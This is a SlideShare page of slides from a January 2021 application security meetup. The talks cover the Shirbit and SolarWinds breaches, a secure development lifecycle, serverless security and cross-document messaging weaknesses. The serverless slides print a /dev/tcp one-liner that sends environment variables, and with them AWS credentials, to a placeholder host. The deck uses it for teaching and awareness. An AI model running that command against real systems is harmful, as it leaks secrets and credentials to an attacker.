SlideShare a Scribd company logo

Application security meetup 27012021

lior mazor
lior mazor

Join us on our upcoming BYOP (Bring Your Own Pizza) "Application Security Meetup" to hear about the latest cyber security breaches, trends and technologies in modern application development. Agenda: 17:00 - 17:10 - Opening words - by Lior Mazor (Organizer) 17:10 - 17:35 - 'Recent cyber security attacks in Israel' - by Lior Mazor (Organizer) 17:35 - 18:00 - ‘How to deliver a secure product’ - by Michael Furman (Tufin) 18:00 - 18:30 - 'Hacking serverless - Introduction to Serverless Application Security' - by Yossi Shenhav (Komodo) 18:30-19:00 - ‘Post Apocalypse: Exploiting web messaging implementations’ - by Chen Gour-Arie (enso security)

Software
1 of 103
Recent Cyber Security Attacks in Israel and Worldwide By Lior Mazor
Agenda • 'Shirbit’ Israeli Insurance Company Security Incident • Chain of events • Point of Failures – Self Evaluation • 'Solarwinds’ global Incident • Incident analysis • Correlation – corporate and as a vendor
ABOUT MYSELF • Leading and Managing the S-SDLC and information product security at Amdocs • B.Sc. Math & Computer Science • Over 18 years of cybersecurity experience • Implementing and promoting Information Security & Cyber Awareness in various enterprise organizations across the world • Building Enterprise Cyber Defense Methodologies and ‘Execution Practices’ • Expertise in Secure Development, Code Review & Application Penetration Testing • Certified as ISO 27001 Lead Auditor Lior Mazor CISSP, CISM, CDPSE
'Shirbit' Israeli Insurance Company
Shirbit Insurance Company – Short Facts With regards to security, the company choose a “CISO as A service” approach – 2 days a week Established officially in 2000 and Considered as part of the small insurance groups in IL The company has ~220 employees based in Israel. The company won a major IL project for insurance hence holding significant personal data (2005) The company holds a cyber security insurance policy by AON (no further details are known) The company utilized an external MDR service, not working on weekends with monitoring abilities only
Chain Of Events 29/11 High level understanding of the incident by Shirbit company begins Active Incident in Place 30/11 Shirbit Company notifies the regulators about a potential breach Regulation Update 31/11 The leakage is notified by the media and published cross different media channels Media Notification 1-2/12 Actively from operational to technological and other factors, company begins its response IR kick in 3-4…/12 Black Shadow post its ransom demandd and actively threatens to publish more data Official Ransom demand … 1. Social media accounts on twitter and Telegram opened with the name “Black Shadow” 2. Darknet search for “technical writers” … 1. Shirbit company takes down (willingly or not) its website and all other internet connected servers/applications. 2. Examples of data stollen is leaked … 1. Data examples continue to surface outside, stating the intention and seriousness of Hackers … 1. First TXT message is sent to customers, stating about a potential cyber breach. 2. Company utilize and hire external IR teams and align Gov' … 1. Data continue to be to be published 2. Shirbit doesn’t plan to pay ransom 3. Data is offered for sale on the darknet 4. Shirbit posts FAQ and additional SMS sent to customers
Partial Facts, Speculation and Assumptions The details below are taken from OSINT data sources (crowd strike, clear sky, general media channels) The attack didn’t happen overnight – in these types of scenarios, the hacker was able to reach a footprint over the past 2-4 months, waited for a trigger or worked under the radar to achieve significant footprint (“living off the land..”) What about their Security Solutions? Very limited ESET AV with no advanced abilities, their DLP software was not configured well. How were they hacked? From known vulnerabilities never patched on their VPN (Pulse) to security gaps on their OWA (outlook web access) that allowed the injection of a backdoor and from there – direct access to their backup servers Hacktivist, nation planned attack or a Cyber Criminal – all theories apply, some state that the group never existed before (no prior knowledge) and is an Iranian/pro Palestine retaliation. Some state that that during negation it seemed to be IL based attack (publish of Infosec policy and origin of opening the telegram group)..
Postmortem Analysis – Points of Failure Self Evaluation! Detect & Analyze Contain, Eradicate & Recover Post- incident activity Prepare Yet to be seen… 1. No official government regulatory statements 2. 4 'class actions' were already filled 3. Company is already “back to business” and issuing new policies 1. To be improved communication to customers and support (minimal FAQ). 2. Ability to evaluate what is the magnitude of breach (Media based) 3. Major attempts to “pass the risk” that are not seen lightly by public 1. The company is still under active incident. 2. Some minor customer notification improvement People Process Tech'
Negotiation Leaked Too Many stakeholders involved..
'Solar Winds' IT Management and Monitoring Company
'Solarwinds’ – Supply Chain Type of Attack A different type of attack, not the traditional data leakage or ransomware Different Actors – This type of attack usually has catachrestic of what is define as “nation-based attack”, not the traditional type of attacks, it’s a carefully planned attack involving aspects of espionage with a completely different type of scale and impact How didn’t they find it? Requires maturity around their code, understanding of insider threat and overall security controls to learn about the potential anomaly How is this happening? Backdoor in the code in the mask of a dedicated file or feature, requires inside and internal access to the CI/CD eco-system Look for the weakest chain & major footprint– supply chain attacks are different; they focus to get major footprint via a weak point. Any type of company that can fall under this category can be targeted
Solar Winds – SUPPLY CHAIN Based Attack • Sophisticated Way of Attack • Almost impossible to detect (if at all) • The attackers inserted malicious code into DLL • SolarWinds Orion Platform installed • The backdoor activates • Randomly between 12 to 14 days after installation • Attackers ping the backdoor • Gathering and sending info • The backdoor runs commands from attackers
What can prevent SolarWinds type of attacks? • As a Corporate: • Perform SDL (Security Development Lifecycle) and change management processes • Map “supply chain” and most valuable assets. • Remove Default credentials from vendor installation play book. • Ensure conditional access to valuable assets. • Enable anomaly detection systems. • Control and audit privilege accounts • As a Vendor: • Perform SDL (Security Development Lifecycle) and change management processes • Secure the development eco-system (CI/CD). • Digitally sign artifacts (yes, still do it). • Peer internal review by R&D • Secure overall corporate environment against rouge actors (corporate accountability)
Questions?
How can you deliver a secure product? Michael Furman, Security Architect
The Legend of SDL ● Steve Lipner  Senior Director of Security Engineering Strategy for Microsoft  Key person for the Microsoft SDL
What will we cover today? What is an SDL? Why is an SDL important? Sample: Tufin SDL How can you deliver a secure product?
About Me ● >12 years in application security ● >8 years with Tufin – Lead Security Architect ● >20 years in software engineering ● www.linkedin.com/in/furmanmichael/ ● ultimatesecpro@gmail.com ● Read my blog https://ultimatesecurity.pro/tags/presentation/ ● Follow me on twitter @ultimatesecpro ● I like to travel, read books and listen to music
About ● Market Leader in Security Policy Automation ● Tufin is used by >2000 enterprises  To segment networks and connect applications  On-prem networks, firewalls, cloud and K8S ● We are the Security Policy Company!
Journey to our SDL ● Resolving security issues? Easy for me! ● Creating a “security” process? Brand new for me! ● Soooo many things to manage ....  Vulnerabilities discovered by customers  CVEs  Upgrading 3rd-party software  Pen tests  ... and all the other stuff I did not yet even know about ● Saved by the SDL! ● No need to reinvent the wheel Picture is from the “Journey to the Center of the Earth” movie.
What is an SDL? ● SDL is the process for developing secure software ● Adds security controls in each development phase SDL = Security Development Lifecycle
History of SDL ● Mail of Bill Gates  From: Bill Gates  To: to every full-time employee at Microsoft  Sent: Tuesday, January 15, 2002 5:22 PM  Subject: Trustworthy computing ● Microsoft shutdown Windows development to handle the security issues ● Microsoft SDL  v 1.0 - 2004 (internal)  v 3.2 - 2008 (public)  v 5.2 - 2012 (recent) … Security: The data our software and services store on behalf of our customers should be protected from harm and used or modified only in appropriate ways. Security models should be easy for developers to understand and build into their applications. Photo from yahoo.com
Why is an SDL important? Why SDL? • Helps developers build secure software • Ensures security is enabled out of the box • Defines how to respond to discovered vulnerabilities
Software Development Life Cycle (SDLC) Implementation Requirements Design Verification Release
SDL - Shift Left Implementation Requirements Design Verification Release
Tufin SDL Implementation Training Requirements Design Verification Release Response Security Design Security Classroom Sessions Security Champions Security Requirements SAST Software Updates Peer Reviews Internal Security Scans DAST External Security Tests Vulnerabil ity Response Policy
Tufin SDL Implementation Training Requirements Design Verification Release Response Security Design Security Classroom Sessions Security Champions Security Requirements SAST Software Updates Peer Reviews Internal Security Scans DAST External Security Tests Vulnerabil ity Response Policy
Security Training ● Security awareness training for the Development and QA teams  The latest security threats, mitigations, and technologies  OWASP Top 10 best practices ● Security Champions
Security Training ● Q: How can a Security Champion be successful? ● Tip: Identify and resolve specific security issues ● Examples of investigations:  Best way for us to handle Content Security Policy (CSP)?  Best way for us to prevent XML External Entity (XXE) attack? ● Tufin success: OWASP meetup lecture https://ultimatesecurity.pro/post/xxe-meetup/
Tufin SDL Implementation Training Requirements Design Verification Release Response Security Design Security Classroom Sessions Security Champions Security Requirements SAST Software Updates Peer Reviews Internal Security Scans DAST External Security Tests Vulnerabil ity Response Policy
Security Requirements ● Incorporated into the requirements stage of S/W development ● Why do we want to handle security early?  Allows us to design a feature and to write test plans which incorporate security requirements up front  Saves time for all of us – developer time, QA time, documentation time
Design ● Designs of new features are done jointly by both development and security teams
Security Requirements & Design ● Q: How can you ensure Dev & QA handle security? ● Tip: Make it easy - create a security checklist ● Examples  New API? • Make sure the API has proper authentication • Make sure the API has proper authorization • Implement input validation  Confidential info not stored as plain text • Use appropriate encryption or hash algorithms  Confidential info not stored on a client side  Confidential info not sent via HTTP GET method  …
Tufin SDL Implementation Training Requirements Design Verification Release Response Security Design Security Classroom Sessions Security Champions Security Requirements SAST Software Updates Peer Reviews Internal Security Scans DAST External Security Tests Vulnerabil ity Response Policy
Static Application Security Testing (SAST) ● What is SAST? ● Q: Any benefit to scan on each commit? ● Tip: Scan at least weekly  Daily is the best option ● Your goal: Fix High issues immediately!
Software Updates ● All 3rd-party software is regularly updated ● Q: Can I ensure all 3rd-party software is kept up-to-date without a tool?  Open-source 3rd-party software  Commercial 3rd-party software ● Tip: check that recommended upgrades don’t introduce new vulnerabilities ● Your goal: upgrade to a version without High or Critical issues!
Peer Reviews ● Mandatory for every code change ● Tip: ensure all code changes adhere to security requirements  Passwords are not stored in plain text  Passwords are not stored on client side  …
Tufin SDL Implementation Training Requirements Design Verification Release Response Security Design Security Classroom Sessions Security Champions Security Requirements SAST Software Updates Peer Reviews Internal Security Scans DAST External Security Tests Vulnerabil ity Response Policy
Internal Security Scans ● What are Internal Security Scans? ● Q: Any benefit to scan on each commit? ● Tip: Scan at least monthly  Depends on your release cycle ● Your goal: Fix High issues immediately!
Internal Security Scans ● Qualys SSL Labs Report – free service https://www.ssllabs.com/ssltest/ ● Tip: Ensure you check the “Do not show the results on the boards” checkbox
Internal Security Scans
Dynamic Application Security Testing (DAST) ● What is DAST? ● Q: Any benefit to scan on each commit? ● Tip: Scan at least monthly  Depends on your release cycle ● Your goal: Fix High issues immediately!
Tufin SDL Implementation Training Requirements Design Verification Release Response Security Design Security Classroom Sessions Security Champions Security Requirements SAST Software Updates Peer Reviews Internal Security Scans DAST External Security Tests Vulnerabil ity Response Policy
External Security Tests ● Why External Security Tests? ● Tips:  Scan at least annually • Best each major release  Ensure to create a valid test scope that covers all areas • WebApp • Infra  Ensure an External Test is added into R&D calendar ● Your goal: fix High issues immediately!  Coordinate retest after your fixes
Tufin SDL Implementation Training Requirements Design Verification Release Response Security Design Security Classroom Sessions Security Champions Security Requirements SAST Software Updates Peer Reviews Internal Security Scans DAST External Security Tests Vulnerabil ity Response Policy
Vulnerability Response Policy • A patch will be made available as soon as possible CRITICAL HIGH MEDIUM LOW NOT VULNERABLE • A fix will be included in the upcoming release • A fix will be included in a future release • A fix may be included in a future release • Nothing to fix
Vulnerability Response Policy ● Define a vulnerability response policy  Document it ● Tip: the policy should be approved on the corporate level  Affect sales, support, development
Rolling out an SDL ● First phase (minimal SDL)  Vulnerability Response Policy  Internal Security Scans • Qualys SSL Labs Report  Software Updates • Using a tool ● Second Phase  External Security Tests ● Third phase  SAST ● Fourth phase  DAST
Rolling out an SDL ● Ongoing  Security Requirements & Design  Security Training  Security Champions  Peer Reviews ● Further improvements  https://www.microsoft.com/en-us/securityengineering/sdl/practices  …
Selecting a tool for any SDL phase ● Perform POC  Define requirements very well before the POC ● Tools can be commercial or open source ● Tools from the same provider is not essential
How can you deliver a secure product? ● Start to roll out an SDL in your organization ● Improve SDL on a regular basis
Take Aways SDL - the framework that ensures secure software Roll out an SDL ... And follow it!!! You will deliver a secure product!
Thank You Questions? Contact me www.linkedin.com/in/furmanmichael/ ultimatesecpro@gmail.com https://ultimatesecurity.pro/ @ultimatesecpro
Serverless Security Yossi Shenhav
About Me Name Yossi Shenhav Experience CEO, Komodo Consulting Projects ctf.komodosec.com www.hacktale.com Spotlight.komodosec.com
WHY SERVERLESS?
Why Serverless SCALABLE COST FOCUS ON CODE
WHAT IS SERVERLESS ARCHITECTURE
NOT PERMANENT
EVENT DRIVEN
ISOLATED
SERVERLESSWEB APPLICATION
SECURITY ADVANTAGES?
SO LONG WEBSHELL
WHAT ABOUT REVERSE SHELL?
Code Execution Vulnerability XXE Unsafe deserialization Unsafe file opening Unsafe use of eval Vulnerable libraries
DEPENDS ON TIMEOUT FOR OUR EXECUTION
DEFAULT AWS SETTINGS IS 3 SECONDS
HOW ABOUT SSRF?
NOLUCK WECANNOTACCESSINSTANCEMETADATA :(
IS IT A DEAD END?
Application layer vulnerabilities (bad code) SQL Injection Authorization Authentication XSS and more
REVERSE SHELL IN OUR LAB
WE WANT THE ENVIRONMENT VARIABLES
ENVIRONMENT VARIABLES EXAMPLE
PLEASE SEND YOUR ENVIRONMENT VARIABLES TO US exec 3<>/dev/tcp/<IP Address>/<port> echo "$(printenv)" 1>&3 "$(cat <&3)"
NOW WE HAVE AWS CREDENTIALS
Conclusion Application level vulnerabilities are to stay – write secure code Misconfiguration of permission in serverless application may result with attackers taking over the entire cloud environment Serverless architecture provides improved security over traditional web architecture
THANK YOU QUESTIONS?
Enso.security Exploiting cross- document messaging Application Security Virtual Meetup 2021
Enso.security Agenda Cross-document messaging Threat and attack models The missing tool Example Takeaways
Enso.security Application Security Virtual Meetup 2021 Live in Tel Aviv, Israel Have been breaking & building all sorts of applications since 2004 Chen Gour-Arie Chief Architect, Enso Security Exploiting cross-document messaging
Enso.security Cross document messaging
Enso.security Cross document messaging Enso.security Window to Window communication channel No network. Everything happens in the browser’s memory Simple security model The Window interface represents a window containing a DOM document; the document property points to the DOM document loaded in that window.
Enso.security Any window in the document hierarchy can send a message to any other document The “message” event will be trigger on the receiving window. Sender window Sender document Sender script Receiver window Receiver document Receiver script Cross document messaging Functional Flow Enso.security
Enso.security Cross document messaging Security Model Enso.security Sender code Receiver window Receiver code Sender code must specify the remote origin* Received messages include info about sender origin. Developer must authorize the call. Origin settings can tell a window to not load in risky scenarios * Wildcards can be used ** Limited browser support Cross-Origin-Opener-Policy** Cross-Origin-Embedder-Policy** X-Frame-Options Guided usage
Enso.security Threat and attack models
Enso.security Sender script Sender document window Receiver document Receiver script Spoofing: Senders aren't who we think they are. Spoofing: The recipients aren't who we think they are. Denial of Service Elevation of Privileges Tampering Information Disclosure Cross-document messaging: STRIDE
Enso.security Receiver window Receiver document Receiver script malicious Sender window Sender script Weakness: Window may not restrict opener. Weakness: Developers can send unrestrictedly Cross-document messaging: Attack Model 1
Enso.security Sender document Sender script Receiver window Receiver script Weakness: Window may not restrict opener. Weakness: Developers may skip authorization check Malicious page opens the victim page and sends messages to it. Sender window malicious Cross-document messaging: Attack Model 2
Enso.security The missing tool
Enso.security The missing tool Enso.security Find senders Should be able to: Find receivers Simulate malicious sender Simulate malicious receiver
Enso.security Posta - open source tool at benso.io
Enso.security Exploit.
Enso.security Exploit.
Enso.security Exploit.
Enso.security Conclusion Cross document messaging weaknesses are: ● By default windows can send data to each other. ● On receiver script, there is no default authorization check. ● Sender scripts can publish data without restrictively choosing recipient. To avoid these, we must spot implementations and test them!
Enso.security Conclusion For engineers Safe use of cross document messaging ● Use XFO/Cross Origin Policies to avoid talking to unwanted origins. ● Send to explicit targets only as in postMessage(message, [explicit target origin]) ● When handling messages, always check event.origin but beware of regex bypass techniques To avoid these, we must spot implementations and test them!
Enso.security Omer Yaron Wix.com Barak Tawily CTO, Enso Security Research is always better with friends!
Discover Autonomous application asset discovery Calibrate Correlate data about assets and their application security controls, backlogs, teams, project and technology - to measure risk posture Manage Rule-based policy to continuously prescribe requirements, adaptive controls, and benchmarks to assets. Enso Application Security Posture Management Thank you!
Enso.security Thank you! Questions?
Thank You! Questions? To be continued…

Recommended

Avoiding data breach using security intelligence and big data to stay out of ...
Avoiding data breach using security intelligence and big data to stay out of ...Avoiding data breach using security intelligence and big data to stay out of ...
Avoiding data breach using security intelligence and big data to stay out of ...IBM Security
 
Day 1 Enisa Setting Up A Csirt
Day 1 Enisa Setting Up A CsirtDay 1 Enisa Setting Up A Csirt
Day 1 Enisa Setting Up A Csirtvngundi
 
It and-cyber-module-2
It and-cyber-module-2It and-cyber-module-2
It and-cyber-module-2Marneil Sanchez
 
Security Intelligence: Finding and Stopping Attackers with Big Data Analytics
Security Intelligence: Finding and Stopping Attackers with Big Data AnalyticsSecurity Intelligence: Finding and Stopping Attackers with Big Data Analytics
Security Intelligence: Finding and Stopping Attackers with Big Data AnalyticsIBM Security
 
Cyber Intelligence Operations Center
Cyber Intelligence Operations CenterCyber Intelligence Operations Center
Cyber Intelligence Operations CenterBill Ross
 
Building CSIRT and its competency
Building CSIRT and its competencyBuilding CSIRT and its competency
Building CSIRT and its competencyDidik Partono Rudiarto
 
Cyber Security Professionals Viewed via Supply Chain
Cyber Security Professionals Viewed via Supply ChainCyber Security Professionals Viewed via Supply Chain
Cyber Security Professionals Viewed via Supply Chainaletarw
 
CSIRT_16_Jun
CSIRT_16_JunCSIRT_16_Jun
CSIRT_16_JunCandan BOLUKBAS
 

Recommended

Avoiding data breach using security intelligence and big data to stay out of ...
Avoiding data breach using security intelligence and big data to stay out of ...Avoiding data breach using security intelligence and big data to stay out of ...
Avoiding data breach using security intelligence and big data to stay out of ...IBM Security
 
Day 1 Enisa Setting Up A Csirt
Day 1 Enisa Setting Up A CsirtDay 1 Enisa Setting Up A Csirt
Day 1 Enisa Setting Up A Csirtvngundi
 
It and-cyber-module-2
It and-cyber-module-2It and-cyber-module-2
It and-cyber-module-2Marneil Sanchez
 
Security Intelligence: Finding and Stopping Attackers with Big Data Analytics
Security Intelligence: Finding and Stopping Attackers with Big Data AnalyticsSecurity Intelligence: Finding and Stopping Attackers with Big Data Analytics
Security Intelligence: Finding and Stopping Attackers with Big Data AnalyticsIBM Security
 
Cyber Intelligence Operations Center
Cyber Intelligence Operations CenterCyber Intelligence Operations Center
Cyber Intelligence Operations CenterBill Ross
 
Building CSIRT and its competency
Building CSIRT and its competencyBuilding CSIRT and its competency
Building CSIRT and its competencyDidik Partono Rudiarto
 
Cyber Security Professionals Viewed via Supply Chain
Cyber Security Professionals Viewed via Supply ChainCyber Security Professionals Viewed via Supply Chain
Cyber Security Professionals Viewed via Supply Chainaletarw
 
CSIRT_16_Jun
CSIRT_16_JunCSIRT_16_Jun
CSIRT_16_JunCandan BOLUKBAS
 
Today's Breach Reality, The IR Imperative, And What You Can Do About It
Today's Breach Reality, The IR Imperative, And What You Can Do About ItToday's Breach Reality, The IR Imperative, And What You Can Do About It
Today's Breach Reality, The IR Imperative, And What You Can Do About ItResilient Systems
 
Proactive cyber defence through adversary emulation for improving your securi...
Proactive cyber defence through adversary emulation for improving your securi...Proactive cyber defence through adversary emulation for improving your securi...
Proactive cyber defence through adversary emulation for improving your securi...idsecconf
 
Making Threat Modeling Useful To Software Development
Making Threat Modeling Useful To Software DevelopmentMaking Threat Modeling Useful To Software Development
Making Threat Modeling Useful To Software DevelopmentConSanFrancisco123
 
Noah Maina: Computer Emergency Response Team (CERT)
Noah Maina: Computer Emergency Response Team (CERT)Noah Maina: Computer Emergency Response Team (CERT)
Noah Maina: Computer Emergency Response Team (CERT)Hamisi Kibonde
 
Challenges2013
Challenges2013Challenges2013
Challenges2013Lancope, Inc.
 
[CB16] Using the CGC’s fully automated vulnerability detection tools in secur...
[CB16] Using the CGC’s fully automated vulnerability detection tools in secur...[CB16] Using the CGC’s fully automated vulnerability detection tools in secur...
[CB16] Using the CGC’s fully automated vulnerability detection tools in secur...CODE BLUE
 
Identifying Code Risks in Software M&A
Identifying Code Risks in Software M&AIdentifying Code Risks in Software M&A
Identifying Code Risks in Software M&AMatt Tortora
 
Birds of a Feather 2017: 邀請分享 Place of Attribution in Threat Intelligence - F...
Birds of a Feather 2017: 邀請分享 Place of Attribution in Threat Intelligence - F...Birds of a Feather 2017: 邀請分享 Place of Attribution in Threat Intelligence - F...
Birds of a Feather 2017: 邀請分享 Place of Attribution in Threat Intelligence - F...HITCON GIRLS
 
VulnerabilityRewardsProgram
VulnerabilityRewardsProgramVulnerabilityRewardsProgram
VulnerabilityRewardsProgramTaha Kachwala
 
Understanding the Cyber Security Vendor Landscape
Understanding the Cyber Security Vendor LandscapeUnderstanding the Cyber Security Vendor Landscape
Understanding the Cyber Security Vendor LandscapeSounil Yu
 
Computer hacking and security - Social Responsibility of IT Professional by M...
Computer hacking and security - Social Responsibility of IT Professional by M...Computer hacking and security - Social Responsibility of IT Professional by M...
Computer hacking and security - Social Responsibility of IT Professional by M...Mark John Lado, MIT
 
Security Challenges and Innovative Solutions for Securing a Complex World
Security Challenges and Innovative Solutions for Securing a Complex WorldSecurity Challenges and Innovative Solutions for Securing a Complex World
Security Challenges and Innovative Solutions for Securing a Complex WorldInfotecsGmbH
 
Hunting for cyber threats targeting weapon systems
Hunting for cyber threats targeting weapon systemsHunting for cyber threats targeting weapon systems
Hunting for cyber threats targeting weapon systemsFidelis Cybersecurity
 
Sean McCloskey: How do we Strengthen the Public-Private Partnership to Mitiga...
Sean McCloskey: How do we Strengthen the Public-Private Partnership to Mitiga...Sean McCloskey: How do we Strengthen the Public-Private Partnership to Mitiga...
Sean McCloskey: How do we Strengthen the Public-Private Partnership to Mitiga...Government Technology and Services Coalition
 
Data Safety And Security
Data Safety And SecurityData Safety And Security
Data Safety And SecurityConstantine Karbaliotis
 
Enumerating your shadow it attack surface
Enumerating your shadow it attack surfaceEnumerating your shadow it attack surface
Enumerating your shadow it attack surfacePriyanka Aash
 
Setting up CSIRT
Setting up CSIRTSetting up CSIRT
Setting up CSIRTAPNIC
 
Cert adli wahid_iisf2011
Cert adli wahid_iisf2011Cert adli wahid_iisf2011
Cert adli wahid_iisf2011Directorate of Information Security | Ditjen Aptika
 
Incident Response in the age of Nation State Cyber Attacks
Incident Response in the age of Nation State Cyber AttacksIncident Response in the age of Nation State Cyber Attacks
Incident Response in the age of Nation State Cyber AttacksResilient Systems
 
Laying the Foundation: The Need for Cybersecurity in U.S. Manufacturing
Laying the Foundation: The Need for Cybersecurity in U.S. ManufacturingLaying the Foundation: The Need for Cybersecurity in U.S. Manufacturing
Laying the Foundation: The Need for Cybersecurity in U.S. ManufacturingIgnyte Assurance Platform
 
Information Technology Security Basics
Information Technology Security BasicsInformation Technology Security Basics
Information Technology Security BasicsMohan Jadhav
 
Cybersecurity and continuous intelligence
Cybersecurity and continuous intelligenceCybersecurity and continuous intelligence
Cybersecurity and continuous intelligenceNISIInstituut
 

More Related Content

What's hot

Today's Breach Reality, The IR Imperative, And What You Can Do About It
Today's Breach Reality, The IR Imperative, And What You Can Do About ItToday's Breach Reality, The IR Imperative, And What You Can Do About It
Today's Breach Reality, The IR Imperative, And What You Can Do About ItResilient Systems
 
Proactive cyber defence through adversary emulation for improving your securi...
Proactive cyber defence through adversary emulation for improving your securi...Proactive cyber defence through adversary emulation for improving your securi...
Proactive cyber defence through adversary emulation for improving your securi...idsecconf
 
Making Threat Modeling Useful To Software Development
Making Threat Modeling Useful To Software DevelopmentMaking Threat Modeling Useful To Software Development
Making Threat Modeling Useful To Software DevelopmentConSanFrancisco123
 
Noah Maina: Computer Emergency Response Team (CERT)
Noah Maina: Computer Emergency Response Team (CERT)Noah Maina: Computer Emergency Response Team (CERT)
Noah Maina: Computer Emergency Response Team (CERT)Hamisi Kibonde
 
[CB16] Using the CGC’s fully automated vulnerability detection tools in secur...
[CB16] Using the CGC’s fully automated vulnerability detection tools in secur...[CB16] Using the CGC’s fully automated vulnerability detection tools in secur...
[CB16] Using the CGC’s fully automated vulnerability detection tools in secur...CODE BLUE
 
Identifying Code Risks in Software M&A
Identifying Code Risks in Software M&AIdentifying Code Risks in Software M&A
Identifying Code Risks in Software M&AMatt Tortora
 
Birds of a Feather 2017: 邀請分享 Place of Attribution in Threat Intelligence - F...
Birds of a Feather 2017: 邀請分享 Place of Attribution in Threat Intelligence - F...Birds of a Feather 2017: 邀請分享 Place of Attribution in Threat Intelligence - F...
Birds of a Feather 2017: 邀請分享 Place of Attribution in Threat Intelligence - F...HITCON GIRLS
 
VulnerabilityRewardsProgram
VulnerabilityRewardsProgramVulnerabilityRewardsProgram
VulnerabilityRewardsProgramTaha Kachwala
 
Understanding the Cyber Security Vendor Landscape
Understanding the Cyber Security Vendor LandscapeUnderstanding the Cyber Security Vendor Landscape
Understanding the Cyber Security Vendor LandscapeSounil Yu
 
Computer hacking and security - Social Responsibility of IT Professional by M...
Computer hacking and security - Social Responsibility of IT Professional by M...Computer hacking and security - Social Responsibility of IT Professional by M...
Computer hacking and security - Social Responsibility of IT Professional by M...Mark John Lado, MIT
 
Security Challenges and Innovative Solutions for Securing a Complex World
Security Challenges and Innovative Solutions for Securing a Complex WorldSecurity Challenges and Innovative Solutions for Securing a Complex World
Security Challenges and Innovative Solutions for Securing a Complex WorldInfotecsGmbH
 
Hunting for cyber threats targeting weapon systems
Hunting for cyber threats targeting weapon systemsHunting for cyber threats targeting weapon systems
Hunting for cyber threats targeting weapon systemsFidelis Cybersecurity
 
Enumerating your shadow it attack surface
Enumerating your shadow it attack surfaceEnumerating your shadow it attack surface
Enumerating your shadow it attack surfacePriyanka Aash
 
Setting up CSIRT
Setting up CSIRTSetting up CSIRT
Setting up CSIRTAPNIC
 
Incident Response in the age of Nation State Cyber Attacks
Incident Response in the age of Nation State Cyber AttacksIncident Response in the age of Nation State Cyber Attacks
Incident Response in the age of Nation State Cyber AttacksResilient Systems
 
Laying the Foundation: The Need for Cybersecurity in U.S. Manufacturing
Laying the Foundation: The Need for Cybersecurity in U.S. ManufacturingLaying the Foundation: The Need for Cybersecurity in U.S. Manufacturing
Laying the Foundation: The Need for Cybersecurity in U.S. ManufacturingIgnyte Assurance Platform
 

What's hot (20)

Today's Breach Reality, The IR Imperative, And What You Can Do About It
Today's Breach Reality, The IR Imperative, And What You Can Do About ItToday's Breach Reality, The IR Imperative, And What You Can Do About It
Today's Breach Reality, The IR Imperative, And What You Can Do About It
 
Proactive cyber defence through adversary emulation for improving your securi...
Proactive cyber defence through adversary emulation for improving your securi...Proactive cyber defence through adversary emulation for improving your securi...
Proactive cyber defence through adversary emulation for improving your securi...
 
Making Threat Modeling Useful To Software Development
Making Threat Modeling Useful To Software DevelopmentMaking Threat Modeling Useful To Software Development
Making Threat Modeling Useful To Software Development
 
Noah Maina: Computer Emergency Response Team (CERT)
Noah Maina: Computer Emergency Response Team (CERT)Noah Maina: Computer Emergency Response Team (CERT)
Noah Maina: Computer Emergency Response Team (CERT)
 
Challenges2013
Challenges2013Challenges2013
Challenges2013
 
[CB16] Using the CGC’s fully automated vulnerability detection tools in secur...
[CB16] Using the CGC’s fully automated vulnerability detection tools in secur...[CB16] Using the CGC’s fully automated vulnerability detection tools in secur...
[CB16] Using the CGC’s fully automated vulnerability detection tools in secur...
 
Identifying Code Risks in Software M&A
Identifying Code Risks in Software M&AIdentifying Code Risks in Software M&A
Identifying Code Risks in Software M&A
 
Birds of a Feather 2017: 邀請分享 Place of Attribution in Threat Intelligence - F...
Birds of a Feather 2017: 邀請分享 Place of Attribution in Threat Intelligence - F...Birds of a Feather 2017: 邀請分享 Place of Attribution in Threat Intelligence - F...
Birds of a Feather 2017: 邀請分享 Place of Attribution in Threat Intelligence - F...
 
VulnerabilityRewardsProgram
VulnerabilityRewardsProgramVulnerabilityRewardsProgram
VulnerabilityRewardsProgram
 
Understanding the Cyber Security Vendor Landscape
Understanding the Cyber Security Vendor LandscapeUnderstanding the Cyber Security Vendor Landscape
Understanding the Cyber Security Vendor Landscape
 
Computer hacking and security - Social Responsibility of IT Professional by M...
Computer hacking and security - Social Responsibility of IT Professional by M...Computer hacking and security - Social Responsibility of IT Professional by M...
Computer hacking and security - Social Responsibility of IT Professional by M...
 
Security Challenges and Innovative Solutions for Securing a Complex World
Security Challenges and Innovative Solutions for Securing a Complex WorldSecurity Challenges and Innovative Solutions for Securing a Complex World
Security Challenges and Innovative Solutions for Securing a Complex World
 
Hunting for cyber threats targeting weapon systems
Hunting for cyber threats targeting weapon systemsHunting for cyber threats targeting weapon systems
Hunting for cyber threats targeting weapon systems
 
Sean McCloskey: How do we Strengthen the Public-Private Partnership to Mitiga...
Sean McCloskey: How do we Strengthen the Public-Private Partnership to Mitiga...Sean McCloskey: How do we Strengthen the Public-Private Partnership to Mitiga...
Sean McCloskey: How do we Strengthen the Public-Private Partnership to Mitiga...
 
Data Safety And Security
Data Safety And SecurityData Safety And Security
Data Safety And Security
 
Enumerating your shadow it attack surface
Enumerating your shadow it attack surfaceEnumerating your shadow it attack surface
Enumerating your shadow it attack surface
 
Setting up CSIRT
Setting up CSIRTSetting up CSIRT
Setting up CSIRT
 
Cert adli wahid_iisf2011
Cert adli wahid_iisf2011Cert adli wahid_iisf2011
Cert adli wahid_iisf2011
 
Incident Response in the age of Nation State Cyber Attacks
Incident Response in the age of Nation State Cyber AttacksIncident Response in the age of Nation State Cyber Attacks
Incident Response in the age of Nation State Cyber Attacks
 
Laying the Foundation: The Need for Cybersecurity in U.S. Manufacturing
Laying the Foundation: The Need for Cybersecurity in U.S. ManufacturingLaying the Foundation: The Need for Cybersecurity in U.S. Manufacturing
Laying the Foundation: The Need for Cybersecurity in U.S. Manufacturing
 

Similar to Application security meetup 27012021

Information Technology Security Basics
Information Technology Security BasicsInformation Technology Security Basics
Information Technology Security BasicsMohan Jadhav
 
Cybersecurity and continuous intelligence
Cybersecurity and continuous intelligenceCybersecurity and continuous intelligence
Cybersecurity and continuous intelligenceNISIInstituut
 
Vulnerability Management – Opportunities and Challenges!
Vulnerability Management – Opportunities and Challenges!Vulnerability Management – Opportunities and Challenges!
Vulnerability Management – Opportunities and Challenges!Outpost24
 
The CISO Problems Risk Compliance Management in a Software Development 030420...
The CISO Problems Risk Compliance Management in a Software Development 030420...The CISO Problems Risk Compliance Management in a Software Development 030420...
The CISO Problems Risk Compliance Management in a Software Development 030420...lior mazor
 
Improve Cybersecurity posture by using ISO/IEC 27032
Improve Cybersecurity posture by using ISO/IEC 27032Improve Cybersecurity posture by using ISO/IEC 27032
